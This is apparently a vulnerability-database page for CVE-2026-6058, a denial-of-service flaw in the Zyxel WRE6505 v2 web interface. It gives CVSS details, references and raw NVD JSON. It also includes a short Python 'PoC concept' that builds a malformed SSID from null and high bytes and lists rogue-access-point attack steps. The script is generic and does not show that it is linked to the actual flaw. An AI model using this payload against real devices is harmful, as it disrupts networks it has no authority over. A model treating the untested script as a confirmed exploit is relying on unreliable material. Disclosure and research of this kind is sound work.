CVE-2026-6058

Description

** UNSUPPORTED WHEN ASSIGNED ** An improper encoding or escaping vulnerability in the CGI program of Zyxel WRE6505 v2 firmware version V1.00(ABDV.3)C0 could allow an adjacent attacker on the WLAN to cause a denial-of-service (DoS) condition in the web management interface by convincing an authenticated administrator to visit the “AP Select” page while a malformed SSID is present.

CVSS Details

CVSS Score

4.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Zyxel WRE6505 v2 V1.00(ABDV.3)C0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC Concept for CVE-2026-6058
# Note: This demonstrates the payload generation. Actual exploit requires an Adjacent attacker position.

def create_malformed_ssid():
    # Payload designed to trigger improper encoding/escaping in the CGI
    # Using specific special characters or format strings
    malformed_payload = "\x00\xff\xfe" + "malicious_ssid"
    return malformed_payload

if __name__ == "__main__":
    ssid = create_malformed_ssid()
    print(f"[+] Generated Malformed SSID: {ssid}")
    print(f"[+] Next Step: Setup a Rogue AP with this SSID.")
    print(f"[+] Trigger: Wait for authenticated Admin to visit 'AP Select' page.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6058
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6058
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6058/
[4] VulDB https://vuldb.com/cve/CVE-2026-6058
[5] https://www.zyxel.com/global/en/support/end-of-life

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6058", "sourceIdentifier": "[email protected]", "published": "2026-04-21T02:16:08.500", "lastModified": "2026-04-21T16:20:24.180", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "** UNSUPPORTED WHEN ASSIGNED ** An improper encoding or escaping vulnerability in the CGI program of Zyxel WRE6505 v2 firmware version V1.00(ABDV.3)C0 could allow an adjacent attacker on the WLAN to cause a denial-of-service (DoS) condition in the web management interface by convincing an authenticated administrator to visit the “AP Select” page while a malformed SSID is present."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://www.zyxel.com/global/en/support/end-of-life", "source": "[email protected]"}]}}